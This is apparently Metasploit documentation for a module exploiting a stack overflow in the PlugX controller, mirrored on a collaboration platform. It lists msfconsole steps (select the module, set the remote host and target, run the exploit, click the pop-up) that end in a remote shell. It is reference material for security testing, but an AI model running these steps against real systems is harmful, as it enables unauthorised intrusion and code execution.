Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/documentation/modules/exploit/windows/misc/plugx.md
Views: 11789
Vulnerable Application
This module exploits a stack overflow in the Plug-X Controller when handling a larger than expected message. This vulnerability can allow remote code execution however it causes a popup message to be displayed on the target before execution is gained.
A vulnerable version of the software is available here: PlugX type 1
Verification Steps
Run the application
Start msfconsole
Do:
use exploit/windows/misc/plugx
Do:
set rhost [ip]
Do:
set target [target]
Do:
exploit
Click OK for the "PeDecodePacket" pop-up on the target
Get a shell